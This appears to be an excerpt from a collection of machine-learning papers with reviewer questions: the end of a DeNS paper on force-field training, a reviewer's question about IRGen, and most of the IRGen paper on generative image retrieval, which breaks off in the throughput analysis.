Equiformer with DeNS results in 20.8% improvement on force MAE without relying on another dataset. Note that we only increase training time by 10.5% while their method takes much more time since PCQM4Mv2 dataset is $3000 \times$ larger than MD17. Moreover, we also train variants of Equiformer ($L_{max} = 2$) by removing attention and layer normalization to investigate the performance gain of DeNS on different network architectures. The results are summarized in Table 5, and DeNS improves all the models. We note that Equiformer without attention and layer normalization reduces to SEGN (Brandstetter et al., 2022) but with a better radial basis function. Since the models cover many variants of equivariant networks, this suggests that DeNS is general and can be helpful to many equivariant networks. ### 5 Conclusion In this paper, we propose to use denoising non-equilibrium structures (DeNS) as an auxiliary task to better leverage training data and improve performance of original tasks of energy and force predictions. Denoising non-equilibrium structures can be an ill-posed problem since there are many possible target structures to denoise to. To address the issue, we propose to take the forces of original structures as inputs to specify which non-equilibrium structures we are denoising. With force encoding, DeNS successfully improve the performance of original tasks when it is used as an auxiliary task. We conduct extensive experiments on OC20, OC22 and MD17 datasets to demonstrate DeNS can boost the performance of energy and force predictions with minimal increase in training cost and are applicable to many equivariant networks. 6 REPRODUCIBILITY STATEMENT We include details on DeNS, architectures, hyper-parameters and training time in Sec. B.1 (OC20), Sec. C.1 (OC22) and Sec. D (MD17). We submit our code reproducing the results of EquiformerV2 trained with DeNS on OC20 S2EF-2M dataset and Equiformer ($L_{max} = 2$) trained with DeNS on MD17 dataset. Following the author guide, after the discussion forums are opened for all submitted papers, we will make a comment directed to the reviewers and area chairs and put a link to an anonymous repository. REFERENCES Ilyes Batatia, David Peter Kovacs, Gregor N. C. Simm, Christoph Ortner, and Gabor Csanyi. MACE: Higher order equivariant message passing neural networks for fast and accurate force fields. In Advances in Neural Information Processing Systems (NeurIPS), 2022. Simon Batzner, Albert Musaelian, Lixin Sun, Mario Geiger, Jonathan P. Mailoa, Mordechai Kornbluth, Nicola Molinari, Tess E. Smidt, and Boris Kozinsky. E(3)-equivariant graph neural networks for data-efficient and accurate interatomic potentials. Nature Communications, 13(1), May 2022. doi: 10.1038/s41467-022-29939-5. URL https://doi.org/10.1038/s41467-022-29939-5. Johannes Brandstetter, Rob Hesselink, Elise van der Pol, Erik J Bekkers, and Max Welling. Geometric and physical quantities improve e(3) equivariant message passing. In International Conference on Learning Representations (ICLR), 2022. URL https://openreview.net/forum?id=_xwr8gOBev1. Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel Ziegler, Jeffrey Wu, Clemens Winter, Chris Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. Language models are few-shot learners. In Advances in Neural Information Processing Systems (NeurIPS), 2020. Lowik Chanussot*, Abhishek Das*, Siddharth Goyal*, Thibaut Lavril*, Muhammed Shuaibi*, Morgane Riviere, Kevin Tran, Javier Heras-Domingo, Caleb Ho, Weihua Hu, Aini Palizhati, Anuroop Sriram, Brandon Wood, Junwoong Yoon, Devi Parikh, C. Lawrence Zitnick, and Zachary Ulissi. Open catalyst 2020 (oc20) dataset and community challenges. ACS Catalysis, 2021. doi: 10.1021/acscatal.0c04525. Stefan Chmiela, Alexandre Tkatchenko, Huziel E. Sauceda, Igor Poltavsky, Kristof T. Schütt, and Klaus-Robert Müller. Machine learning of accurate energy-conserving molecular force fields. Science Advances, 3(5):e1603015, 2017. doi: 10.1126/sciadv.1603015. URL https://www.science.org/doi/abs/10.1126/sciadv.1603015. Stefan Chmiela, Huziel E. Sauceda, Klaus-Robert Müller, and Alexandre Tkatchenko. Towards exact molecular dynamics simulations with machine-learned force fields. Nature Communications, 9(1), sep 2018. doi: 10.1038/s41467-018-06169-2. Mostafa Dehghani, Josip Djolonga, Basil Mustafa, Piotr Padlewski, Jonathan Heek, Justin Gilmer, Andreas Steiner, Mathilde Caron, Robert Geirhos, Ibrahim Alabdulmohsin, Rodolphe Jenatton, Lucas Beyer, Michael Tschannen, Anurag Arnab, Xiao Wang, Carlos Riquelme, Matthias Minderer, Joan Puigcerver, Utku Evci, Manoj Kumar, Sjoerd van Steenkiste, Gamaleldin F. Elsayed, Aravindh Mahendran, Fisher Yu, Avital Oliver, Fantine Huot, Jasmin Bastings, Mark Patrick Collier, Alexey Gritsenko, Vignesh Birodkar, Cristina Vasconcelos, Yi Tay, Thomas Mensink, Alexander Kolesnikov, Filip Pavetić, Dustin Tran, Thomas Kipf, Mario Lučić, Xiaohua Zhai, Daniel Keysers, Jeremiah Harmsen, and Neil Houlsby. Scaling vision transformers to 22 billion parameters. arXiv preprint arXiv:2302.05442, 2023. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. BERT: Pre-training of deep bidirectional transformers for language understanding. arxiv preprint arxiv:1810.04805, 2019.
EMCXCTsmSx
seems like we can directly use the code from semantic tokenizer for image retrieval -- similar to how product quantization performs retrieval, what is the necessity of employing the decoder? What is the disadvantange/how much performance degrades if we just use the semantic tokenizer's code for retrieval?
IRGen: Generative Modeling for Image Retrieval Anonymous authors Paper under double-blind review Abstract While generative modeling has become prevalent across numerous research fields, its potential application to image retrieval has yet to be thoroughly justified. In this paper, we present a novel approach, reframing image retrieval as a variant of generative modeling and employing a sequence-to-sequence model. This provides promising alignment with the overarching theme of unification in current research. Our framework enables end-to-end differentiable search, leading to superior performance through direct optimization. During the development of IRGen, we tackle the key technical challenge of converting an image into a concise sequence of semantic units, which is essential to facilitate efficient and effective search. Extensive experiments demonstrate that our model yields significant improvement over various widely utilized benchmarks, and further validate its performance on million-scale datasets. The most intriguing finding lies in the substantial enhancement of precision scores achieved through generative modeling, which potentially opens the avenue to excluding the rerank stage typically utilized in practical retrieval pipelines. 1 Introduction Generative modeling has made significant progress in a wide range of tasks including machine translation (Vaswani et al., 2017), conversational modeling (Devlin et al., 2018; Brown et al., 2020; Ouyang et al., 2022; Adiwardana et al., 2020), image captioning (Yu et al., 2022a), image classification (Chen et al., 2020), text-to-image synthesis (Ramesh et al., 2022; Ding et al., 2022), and many more. Originating from language and then expanding to other modalities with specially designed tokenizers, such a universal modeling approach provides a promising direction for unifying different tasks into a versatile pretrained model, which has attracted widespread attention (Alayrac et al., 2022; Wang et al., 2022a; Ouyang et al., 2022; Li et al., 2023). Yet its potential in image retrieval has been unexplored. This paper aims to take the unified trend one step further and investigates generative modeling for image retrieval. A practical retrieval system generally consists of two stages: feature representation learning (El-Nouby et al., 2021; Liu et al., 2022; Lee et al., 2022b; Yang et al., 2021) and Approximate Nearest Neighbor (ANN) search (Babenko & Lempitsky, 2014b; Johnson et al., 2019; Guo et al., 2020; Chen et al., 2021). Most image retrieval methods focus only on one individual stage while ignoring the fact that both stages are inherently and deeply connected in actual service. Thus, the practical system often requires careful per-task hyperparameter tuning to make the most out of the coordination of the feature extraction and ANN search. While recent progress (Gao et al., 2020; De Cao et al., 2020; Wang et al., 2022b; Tay et al., 2022) have been made towards end-to-end search in the scenario of recommendation, entity retrieval and document retrieval, little has been done for image retrieval. In this paper, we cast image retrieval as a form of generative modeling and make use of standard Transformer architecture, as in GPT (Brown et al., 2020; Radford et al., 2019; 2018), to enable end-to-end differentiable search. Our model, IRGen, is a sequence-to-sequence model that, given a provided query image, directly generates identifiers corresponding to the query’s nearest neighbors. Specifically, the model takes a query image as input and autoregressively predicts discrete visual tokens, which are considered as the identifier of an image. The predicted visual tokens are supposed to point to the query image’s nearest neighbor. As such, IRGen can be trained directly from the final retrieval target starting with raw images. Two fundamental concerns need to be addressed to enable efficient and effective image retrieval using generative modeling. First, autoregressive generative modeling is notable for its slow sampling process due to the inherently sequential nature, thus the run-time cost for retrieval grows at least linearly with respect to the length of a sequence. Second, it is particularly difficult to model the semantic relationship between the identifiers if we drastically shortened the image identifier. Therefore, a semantic tokenizer specially designed for image retrieval is an immediate problem. We observe that existing image tokenizers (Van Den Oord et al., 2017; Lee et al., 2022a), normally designed for image generation task, are not suitable for image retrieval task, leading to poor performance as analyzed in our experiments. We hence propose several key ingredients that first inject semantic information by applying image-level supervision rather than pixel-level reconstructive supervision, then generate dependent tokens in a sequence by leveraging the recursive property of residual quantization, and lastly ensure fast inference speed by tremendously reducing the length of the sequence via exploiting the global feature instead of spatial patch embeddings. Afterwards, we intentionally adopt the standard Transformer architecture so that it is easy to scale up the model using existing techniques and infrastructures. The proposed IRGen model has set new records across a diverse range of image retrieval datasets, owing to its end-to-end differentiable search capability. It consistently outperforms previous strong competitors by a significant margin, sometimes even surpassing linear scan search methods. For instance, when compared with the best baseline methods, which include linear scan search, our model achieves remarkable improvement, such as a 20.2% increase in precision@10 on In-shop Clothes dataset (Liu et al., 2016), a 6.0% boost in precision@2 on CUB200 (Wah et al., 2011) and a 2.4% enhancement in precision@2 on Cars196 (Krause et al., 2013). To assess the scalability of our model, we further experiment on million-level datasets, namely ImageNet (Deng et al., 2009) and Places365 (Zhou et al., 2017a), and consistently demonstrated superior performance in these challenging scenarios. It is our belief that generative models have the potential to redefine the landscape of image retrieval. The application of generative modeling to image retrieval tasks not only represents an exciting opportunity but also has the potential to unify information retrieval across various modalities. At a technical level, our model, IRGen, effortlessly bridges the gap between feature representation learning and approximate search, creating an end-to-end differentiable framework that enables direct optimization based on retrieval objectives. Furthermore, the entire framework is conceptually straightforward, with all components relying on the standard Transformer architecture, renowned for its remarkable scalability (Du et al., 2022; Chowdhery et al., 2022; Shoeybi et al., 2019; Xu et al., 2021). To the best of our knowledge, our work marks the pioneering exploration of generative modeling in the domain of image retrieval, extending the boundaries of generative modeling into new territories. Along this journey, we have introduced a fundamentally distinct retrieval approach that has demonstrated impressive performance on various retrieval benchmarks. 2 METHOD 2.1 SEMANTIC IMAGE TOKENIZER As Transformer becomes the ubiquitous architecture in computer vision, it has emerged many successful image tokenizers such as VQ-VAE (Van Den Oord et al., 2017; Ramesh et al., 2021; Gafni et al., 2022; Yu et al., 2021), RQ-VAE (Lee et al., 2022a) and so on. Basically, these methods learn a variational auto-encoder with discrete latent variables, together with a learnable and indexable codebook over a collection of raw images. As a result, an image is represented as a sequence of accountable discrete codes indicating the entries in the codebook. A proper combination of entries can be decoded to a high-quality image through the decoder. Such tokenizer has been widely applied to image synthesis, and can be easily extended to audio and video synthesis. Despite its success in image generation, we believe that this approach may not be well-suited for the retrieval task. There are several reasons for this. Firstly, the process of decoding latent codes to reconstruct raw images is essential for generating images in synthesis tasks but is not required for retrieval tasks. Secondly, the length of the code sequence has a significant impact on the inference speed of autoregressive models, which is crucial for efficient search in our case. It is particularly challenging to handle very short sequences of codes, whereas current code sequences used for re- trieval are often quite long (e.g., the feature map of $8 \times 8$ with a depth of 4 in RQ-VAE results in a sequence length of 256). Additionally, for retrieval, it’s important to inject semantic information into the latent codes, while image reconstruction loss, which is commonly used in generative models, tends to focus on low-level details, including imperceptible local details and noise. Building on the insights mentioned earlier, we suggest investigating the global feature extracted from the class token instead of relying on the default spatial tokens. This approach offers a substantial reduction in sequence length (from 64 tokens down to just 1 token). Additionally, the class token inherently contains a condensed, high-level semantic representation as a byproduct of this strategy. Let $f_{cls}$ denote the $d$-dimensional feature vector outputted from the class token, which is taken as the image representation. We adopt residual quantization (RQ) or stacked composite quantization to approximate this feature. Suppose there are $M$ codebooks with each containing $\hat{L}$ elements, $C_m = \{c_{m1}, \cdots, c_{m\hat{L}}\}$. RQ recursively maps the embedding $f_{cls}$ to a sequentially ordered $M$ codes, $f_{cls} \rightarrow \{l_1, l_2, \cdots, l_M\} \in [\hat{L}]^M$. Let $r_0 = f_{cls}$, we have $$l_m = \arg\min_{l \in [\hat{L}]} \|r_{m-1} - c_{ml}\|_2^2,$$ $$r_m = r_{m-1} - c_{ml}, \quad m = 1, 2, \cdots, M.$$ (1) The process of sequentially generating discrete codes is inherently compatible with sequential autoregressive generation. This alignment helps alleviate the optimization challenges associated with modeling the relationships within identifiers. To further inject semantic prior, we train the network under classification loss over both the original embeddings as well as the reconstructed embeddings. In particular, we consider a series of reconstruction levels denoted as $\hat{f}_{cls}^{<m} = \sum_{i=1}^{m} c_{li}$, $m = 1, 2, \cdots, M$. Each prefix code thus encodes semantic information to a certain degree. Adding up the $M$ levels of partial reconstruction error, the complete objective function is then formulated as, $$L = L_{cls}(f_{cls}) + \lambda_1 \sum_{m=1}^{M} L_{cls}(\hat{f}_{cls}^{<m}) + \lambda_2 \sum_{m=1}^{M} \|r_m\|_2^2,$$ $$r_m = f_{cls} - sg(\hat{f}_{cls}^{<m}), \quad m = 1, 2, \cdots, M,$$ (3) where $sg[\cdot]$ is the stop gradient operator. During training, we adopt alternative optimization to update the codebook and the network. For computing the gradient of $L_{cls}(\hat{f}_{cls}^{<m})$, we follow the straight-through estimator (Bengio et al., 2013) as in (Van Den Oord et al., 2017) and approximate the gradient by copying the gradients at $\hat{f}_{cls}^{<m}$ directly to $f_{cls}$. After optimization, we hope that images with similar classes have close codes. In the experiments, we present comparison with other discrete identifiers including random codes and codes from hierarchical k-means algorithm or from RQ-VAE. ### 2.2 Encoder-Decoder for Autoregressive Retrieval Once we have established a robust discrete latent structure equipped with semantic prior information, our next step is to train a powerful autoregressive sequence-to-sequence model solely on these discrete random variables without referring their visual content. Our encode-decoder architecture decouples the input embedding from the generation of discrete codes. The model begins by taking a query image as input to obtain the query embedding, which is then used to produce the discrete codes. It is worth noting that the yielded discrete codes represent the query’s nearest neighbor images within the database. Therefore, our training process involves image pairs $(x_1, x_2)$, where $x_2$ is the nearest neighbor of $x_1$. Our model’s objective is to predict the identifiers of $x_2$ when given $x_1$ as input. This setup allows the model to learn the semantic relationships between images in the dataset. Figure 1 provides a concise view of our training pipeline. To be specific, let the encoder be denoted as $E$ based on the ViT base architecture and the decoder be $D$, a standard Transformer that includes causal self-attention, cross-attention and MLP layers. We leverage the spatial tokens outputted from the encoder as the input embedding, $e = E(x_1)$, which is injected into the decoder through cross attention. Our training objective involves predicting the next token in the image identifier sequence. Specifically, we aim to maximize the probability of the $i$-th token of the image identifier given the input embedding and the previously predicted tokens, $p(l_i|x_1, l_1, \cdots, l_{i-1}, \theta)$, where $\theta$ denotes the parameters of both $D$ and $E$, and $l_1, l_2, \cdots, l_M$ are the $M$ tokens that make up the image identifier for $x_2$, generated by the image tokenizer. By maximizing the probability of each token, we effectively maximize the likelihood of generating the image identifier of an image, $$p(l_1, \ldots, l_M | x_1, \theta) = \Pi_{m=1}^{M} p(l_i | x_1, l_1, \ldots, l_{m-1}, \theta).$$ We apply a softmax cross-entropy loss on a vocabulary of $M$ discrete tokens during training. This loss guides the model to generate the correct sequence of tokens that represent the image identifier. ### 2.3 Beam Search During inference, given a query image $q$, we first calculate the query embedding processed by the encoder $\mathbb{E}$ and then generate the discrete codes through the decoder $\mathbb{D}$ based on the query embedding in an autoregressive manner. These discrete codes represent an image that is considered as the nearest neighbor to the query image. To perform Top-K retrieval, our model can use beam search, allowing us to find the top-$K$ images that are the closest matches to the query image. Specifically, when provided with a query image, our model employs an autoregressive approach to generate discrete codes, commencing with the start-of-sequence token. In contrast to the single candidate considered in greedy search, our model utilizes beam search, which maintains a “beam” of the top-$K$ candidates at each generation step. At each step, the candidates are ranked based on their scores, which are computed as the product of the probabilities associated with their individual elements. We retain only the top-$K$ sequences with the highest scores. It’s important to note that not all generated identifiers are necessarily valid, meaning that an identifier belonging to the set $[L]^M$ may not correspond to any images within the retrieval database. Therefore, we must validate the generated image identifier at each step, which can be a time-consuming process. However, we address this challenge by expediting the validation process. We achieve this by imposing constraints on the beam search, ensuring that it explores only within a prefix tree containing valid codes. This optimization enhances the efficiency of the retrieval process. **Beam search vs. ANN search.** Indeed, there are certain similarities between beam search and approximate nearest neighbor (ANN) search, as both methods aim to select the top-$K$ most promising candidates by traversing tree-like data structures. However, they diverge significantly in how they calculate the score to choose the current node. In ANN search, the score is typically determined by computing the distance between the query feature and the feature associated with the node, using a specific distance metric. On the other hand, in beam search, the score or probability is generated as a function through a differentiable neural network, often an autoregressive model. This neural network is conditioned on the query and learns to estimate the score or probability of a candidate sequence. Consequently, the entire retrieval pipeline can be optimized in an end-to-end manner, taking advantage of neural network training techniques. | Model | In-shop | CUB200 | Cars196 | |---------------|---------|--------|---------| | | 1 | 10 | 20 | 30 | 1 | 2 | 4 | 8 | 1 | 2 | 4 | 8 | | **Linear scan search** | | | | | | | | | | | | | | Res101-Img | 30.7 | 10.2 | 7.1 | 5.8 | 46.8 | 43.6 | 39.9 | 34.9 | 25.9 | 22.0 | 18.5 | 15.4 | | CLIP | 57.5 | 22.8 | 16.6 | 14.1 | 66.0 | 63.5 | 59.4 | 53.8 | 70.8 | 67.8 | 63.3 | 57.2 | | CGD(repro) | 83.2 | 47.8 | 40.2 | 37.0 | 76.7 | 75.5 | 73.7 | 71.4 | 87.1 | 86.1 | 84.6 | 82.6 | | IRT_R(repro) | 92.7 | 59.6 | 51.1 | 47.6 | 79.3 | 77.7 | 75.0 | 71.4 | 75.6 | 73.1 | 68.3 | 61.7 | | FT-CLIP | 91.4 | 66.8 | 58.9 | 55.4 | 79.2 | 77.6 | 76.0 | 73.2 | 88.4 | 87.7 | 87.1 | 85.8 | | **Faiss IVF PQ search** | | | | | | | | | | | | | | CGD(repro) | 60.4 | 30.5 | 24.5 | 22.0 | 71.6 | 70.8 | 69.9 | 68.7 | 84.8 | 84.4 | 84.1 | 83.3 | | IRT_R(repro) | 68.6 | 35.7 | 29.3 | 26.6 | 68.9 | 67.6 | 66.2 | 63.4 | 59.1 | 57.5 | 54.7 | 51.7 | | FT-CLIP | 63.7 | 37.0 | 30.7 | 28.0 | 72.6 | 72.1 | 71.2 | 69.7 | 86.5 | 86.3 | 86.2 | 86.0 | | **Scann search** | | | | | | | | | | | | | | CGD(repro) | 83.0 | 47.7 | 40.3 | 37.2 | 76.7 | 75.2 | 73.8 | 71.4 | 87.1 | 86.1 | 84.5 | 82.6 | | IRT_R(repro) | 92.0 | 58.2 | 50.0 | 46.6 | 79.3 | 77.7 | 75.1 | 71.4 | 75.4 | 72.8 | 68.1 | 61.6 | | FT-CLIP | 90.4 | 64.6 | 56.9 | 53.5 | 79.2 | 77.5 | 76.0 | 73.2 | 88.3 | 87.7 | 87.1 | 85.8 | | **Spann search** | | | | | | | | | | | | | | CGD(repro) | 83.0 | 47.7 | 40.3 | 37.1 | 76.7 | 75.5 | 73.7 | 71.4 | 87.0 | 86.1 | 84.6 | 82.6 | | IRT_R(repro) | 91.4 | 56.2 | 47.9 | 44.5 | 79.3 | 77.6 | 75.0 | 71.4 | 74.8 | 72.4 | 67.6 | 61.1 | | FT-CLIP | 90.2 | 62.9 | 55.1 | 51.8 | 78.5 | 77.6 | 76.0 | 73.2 | 88.6 | 88.1 | 87.5 | 86.3 | | **Beam search** | | | | | | | | | | | | | | IRGen (ours) | 92.4 | 87.0 | 86.6 | 86.5 | 82.7 | 82.7 | 83.0 | 82.8 | 90.1 | 89.9 | 90.2 | 90.5 | Table 1: Precision comparison with different baselines, for which we consider linear scan search, Faiss IVF search and SPANN search. (repro) denotes the model reproduced by ourselves to ensure the same data process and comparable model size for fair comparison. Our model adopt beam search for retrieval, achieving significant improvement and performing even better than linear scan search. 3 EXPERIMENTS We conduct comprehensive evaluations to demonstrate the performance of the proposed IRGen. We first evaluate our method on common image retrieval datasets and on two large-scale datasets, ImageNet (Deng et al., 2009) and Places365 (Zhou et al., 2017a). For a detailed description of the datasets and implementation details, please refer to the appendix. Baselines. We evaluate our model’s performance in comparison to five competitive baselines: 1) ResNet-101 (He et al., 2016) trained from ImageNet dataset, denoted as Res101-Img, which is commonly used as a feature extraction tool for various tasks; 2) CLIP (Radford et al., 2021) trained on 400M image-text pairs, known for powerful zero-shot capability; 3) CGD (Jin et al., 2019), a state-of-the-art method based on ResNet; 4) IRT (El-Nouby et al., 2021), a Transformer-based model for image retrieval and we use the best-performing model IRT_R; 5) FT-CLIP, a baseline finetuned from CLIP on the target dataset. For both CGD and IRT, we have reproduced these models to ensure consistent data processing and comparable model sizes. Specifically, we use ResNet-101 for CGD and DeiT-B for IRT. We also provide their best results from their original papers for reference. Search process. The baseline models primarily focus on effective feature learning. After training, these models are utilized to extract features for the database images. During the search process, a given query image is initially passed through the model to obtain its query feature. Subsequently, this query feature is compared with the features of database images using a specific distance metric. Following the conventions established in previous works such as (Radford et al., 2021; Jin et al., 2019; El-Nouby et al., 2021), we employ the cosine distance for the CLIP model and the Euclidean distance for the other baseline models. We evaluate two search strategies: linear scan search (K-nearest neighbors or KNN) and approximate nearest neighbor search (ANN). Linear scan search is known for its accuracy but is computationally intensive. In contrast, ANN is significantly more efficient. For ANN, we explore: (i) the popular Faiss IVF PQ (Johnson et al., 2019); (ii) the state-of-the-art memory-based algorithm Scann (Guo et al., 2020) with the default setting; and (iii) the state-of-the-art disk-based SPANN algorithm (Chen et al., 2021). These evaluation strategies allow us to assess the retrieval performance of our model against a variety of search methods. 3.1 RESULTS Table 1 presents a detailed performance comparison in terms of precision@K, which assesses the percentage of retrieved candidates that share the same class as the query among the top K results. | Model | In-shop | CUB200 | Cars196 | |-------------|---------|--------|---------| | | 1 | 10 | 20 | 30 | 1 | 2 | 4 | 8 | 1 | 2 | 4 | 8 | | **Linear scan search** | | | | | Res101-Img | 30.7 | 55.9 | 62.7 | 66.8 | 46.8 | 59.9 | 71.7 | 80.8 | 25.9 | 35.6 | 47 | 59.7 | | CLIP | 57.5 | 83.0 | 87.5 | 89.7 | 66.0 | 78.1 | 87.7 | 93.5 | 70.8 | 82.6 | 91.1 | 95.9 | | CGD* | 91.9 | 98.1 | 98.7 | 99.0 | 79.2 | 86.6 | 92.0 | 95.1 | 94.8 | 97.1 | 98.2 | 98.8 | | IRT_R* | 91.9 | 98.1 | 98.7 | 99.0 | 79.6 | 85.0 | 91.1 | 94.3 | - | - | - | - | | FT-CLIP | 91.4 | 97.3 | 98.1 | 98.5 | 79.2 | 85.0 | 89.3 | 92.0 | 88.4 | 90.5 | 92.5 | 93.8 | | **Faiss IVF PQ search** | | | | | CGD(repro) | 60.4 | 76.0 | 77.1 | 77.4 | 71.6 | 77.4 | 81.5 | 84.2 | 84.8 | 88.0 | 89.8 | 91.0 | | IRT_R(repro)| 68.6 | 79.2 | 80.0 | 80.2 | 68.9 | 77.9 | 85.0 | 89.3 | 59.1 | 70.4 | 78.2 | 83.4 | | FT-CLIP | 63.7 | 70.7 | 71.1 | 71.2 | 72.6 | 78.0 | 82.3 | 85.2 | 86.5 | 86.9 | 87.2 | 87.5 | | **SeaNN search** | | | | | CGD(repro) | 83.0 | 94.8 | 96.2 | 96.7 | 76.7 | 83.5 | 88.0 | 91.8 | 87.1 | 91.7 | 94.6 | 96.6 | | IRT_R(repro)| 92.0 | 97.8 | 98.3 | 98.4 | 79.3 | 86.8 | 91.9 | 94.7 | 75.4 | 84.7 | 90.9 | 95.0 | | FT-CLIP | 90.4 | 95.9 | 96.6 | 96.9 | 79.2 | 85.0 | 89.2 | 92.7 | 88.3 | 90.5 | 92.4 | 93.7 | | **SPANN search** | | | | | CGD(repro) | 83.0 | 95.0 | 96.4 | 96.9 | 76.7 | 83.4 | 87.9 | 91.8 | 87.0 | 91.7 | 94.6 | 96.7 | | IRT_R(repro)| 91.4 | 97.2 | 97.6 | 97.7 | 79.3 | 86.8 | 91.9 | 94.7 | 74.8 | 84.3 | 90.5 | 94.7 | | FT-CLIP | 90.2 | 95.8 | 96.7 | 97.0 | 78.5 | 85.0 | 89.4 | 92.9 | 88.6 | 90.7 | 92.5 | 94.2 | | **Beam search** | | | | | IRGen (ours) | 92.4 | 96.8 | 97.6 | 97.9 | 82.7 | 86.4 | 89.2 | 91.4 | 90.1 | 92.1 | 93.2 | 93.7 | Table 2: Recall comparison with different baselines, for which we consider linear scan search, Faiss IVF search and SPANN search. (repro) denotes the model reproduced by ourselves to ensure the same data process and comparable model size for fair comparison. We include the best result of CGD and IRT from their original papers for context with * denotation. Our model adopt beam search for retrieval, achieving comparable performance in most cases. Our model consistently outperforms all other models, even surpassing those employing linear scan search. Notably, we achieve remarkable improvements, such as a 20.2% boost in precision@10 on the In-shop Clothes dataset, a 6.0% increase in precision@2 on the CUB200 dataset, and a 2.4% gain in precision@2 on the Cars196 dataset. Furthermore, several observations can be made: 1) Finetuned models, tailored to specific datasets, exhibit significantly better performance compared to off-the-shelf feature extractors like CLIP and ImageNet-pretrained ResNet-101. 2) Generally, models equipped with ANN algorithms perform slightly worse than their counterparts using linear scan search. However, there are exceptions, such as FT-CLIP with SPANN search on the Cars196 dataset, which demonstrates the importance of end-to-end optimization. 3) Our model consistently maintains high precision scores as $K$ increases, while other models experience a substantial drop. Table 2 provides a comparison of different models using the Recall@K metric. Recall@K measures the proportion of queries for which at least one image among the top $K$ retrieved candidates shares the same label as the query image, yielding a score of 1 if true and 0 otherwise. The table also includes the best recall results of CGD and IRT from their respective original papers for reference. It’s important to note that these models may have different data preprocessing, model sizes, and additional training techniques. Here are the key observations: 1) Our IRGen model achieves the highest Recall@1 score compared to all other models. However, for other recall scores, our model performs similarly or slightly worse. This discrepancy may arise from the current objective loss used in autoregressive models, which heavily optimizes for Recall@1 while giving less emphasis to other recall values. One potential solution is to incorporate the beam search process into training for joint optimization. 2) Different combinations of feature extractors and ANN algorithms exhibit significant variations across the three datasets, highlighting the challenges of achieving coordination in practical scenarios. 3) Notably, despite the high recall achieved by baselines, they often require an additional re-ranking stage to improve precision, whereas our model already attains high precision scores without the need for re-ranking. Figure 2 illustrates the precision-recall curve, where recall represents the true positive rate. Our approach, IRGen, consistently delivers outstanding performance, maintaining high precision and recall simultaneously. In addition to precision-recall analysis, we evaluate our model using the mean reciprocal rank (MRR) metric, which measures the inverse of the rank of the first relevant item. We compute MRR for four different values: 1, 2, 4, and 8, and display the corresponding curves in Figure 3. The baselines employ the SPANN retrieval algorithm. Our IRGen model consistently outperforms the baselines across all evaluated metrics, confirming the effectiveness of our framework. Figure 2: Precision-Recall (TPR) curve comparison for different methods on (a) In-shop Clothes, (b) CUB200 and (c) Cars196 dataset. Figure 3: MRR with respect to 1,2,4,8 comparison for different methods on (a) In-shop Clothes, (b) CUB200 and (c) Cars196 dataset. Notably, there is significant variability in the performance gap between each baseline and our model across the three datasets, highlighting the challenges and dataset-dependent nature of retrieval tasks. Results on million-level datasets. We further experiment our approach with ImageNet dataset (Deng et al., 2009) that contains 1,281,167 images and Places365-Standard (Zhou et al., 2017a) containing about 1.8M images from 365 scene categories. We compare with the strong baselines including CLIP model as well as FT-CLIP model finetuned based on CLIP model. The comparison is reported in Figure 4 and Table 3 focusing on precision@K and MAP@100. Our IRGen model consistently outperforms the baselines, achieving the best results in terms of precision@K and MAP@100. The precision values for our model remain consistently high as K increases, while the baselines experience noticeable performance degradation. These results confirm the effectiveness of our model in handling large-scale datasets like ImageNet, where it maintains high precision across varying values of K and outperforms the baseline models. 3.2 Ablations The effect of identifiers. In our study of image identifiers, we compared three different approaches: (1) assigning random identifiers to images, (2) hierarchical k-means (HKM), and (3) using the image tokenizer RQ-VAE (Bevilacqua et al., 2022). The results of this comparison are summarized in Table 5. The random assignment of identifiers to images yielded expectedly lower performance. This performance gap can be attributed to the fact that models with random identifiers need to learn not only the interaction between queries and image identifiers but also allocate capacity to learn relationships within the identifiers themselves. On the other hand, HKM showed superior performance compared to random assignment, underscoring the significance of semantic identifiers. However, our proposed semantic image identifiers demonstrated a clear improvement over HKM, highlighting their effectiveness in enhancing retrieval performance. In contrast, the performance of RQ-VAE significantly trailed behind our model, with a performance less than 10 percent. We attribute this difference to that the sequence length in RQ-VAE is too long for the model to effectively capture relationships within the identifiers. Generalize to new data. Addressing the inclusion of fresh data holds particular significance, especially in the context of search scenarios. To assess this capacity, we conducted an experiment where | Dataset | Model | |-----------|----------------| | | CLIP FT-CLIP IRGen (ours) | | ImageNet | 44.1 65.5 **76.0** | | Places365 | 22.1 30.3 **44.3** | Table 3: MAP@100 comparison on two million-level datasets. The results of CLIP and FT-CLIP are retrieved by SPANN. | Model | Precision | |------------------------|-----------| | FT-CLIP + Linear Scan | 70.6 65.0 55.6 | | IRGen (Ours) | **77.0** **77.9** **77.4** | Table 4: Generalize to new data. We split 5% of the training data from the ImageNet dataset for inference and remained unseen during training. ![ImageNet](image) Figure 4: Precision comparison on large scale datasets: ImageNet and Places365. | Identifier | T | Precision | Recall | |------------|---|-----------|---------| | Random | 4 | 87.6 75.4 70.8 | 87.6 95.1 96.0 | | HKM100 | 4 | 88.2 80.0 78.2 | 87.2 93.1 94.3 | | HKM200 | 3 | 89.0 81.6 79.8 | 89.0 93.9 94.9 | | Ours | 4 | **92.4** **87.0** **86.6** | **92.4** **96.8** **97.6** | Table 5: Ablation study on the image identifier (T=length). We intentionally withheld 5% of the training data from the ImageNet dataset during the training phase and introduced it during inference, all without updating the existing codebook and autoregressive (AR) model. In this experiment, we compared the performance of our model with the formidable baseline FT-CLIP, which is equipped with a linear scan search. The results, as displayed in Table 4, reveal that our model maintains superior performance even when confronted with new data. This observation highlights our model’s remarkable ability to effectively generalize to previously unseen data. This capability is attributed to the fact that our model can derive semantic identifiers for the newly introduced images using the codebook, leveraging the knowledge it has acquired through the autoregressive decoder. The AR model excels in capturing the semantic structure embedded within the database through its learned parameters. **Inference throughput.** In addition to search accuracy, search efficiency is a critical criterion for retrieval systems. To assess the time cost of our autoregressive (AR) model, we conducted our analysis on an NVIDIA V100-16G GPU. In Figure 5, we present the throughput for 100 queries, with beam sizes set at 1, 10, 20, and 30 for comparison. Additionally, we break down the time cost of each component during retrieval. The results show that the encoder is quite fast, while the autoregressive decoder becomes the major bottleneck, 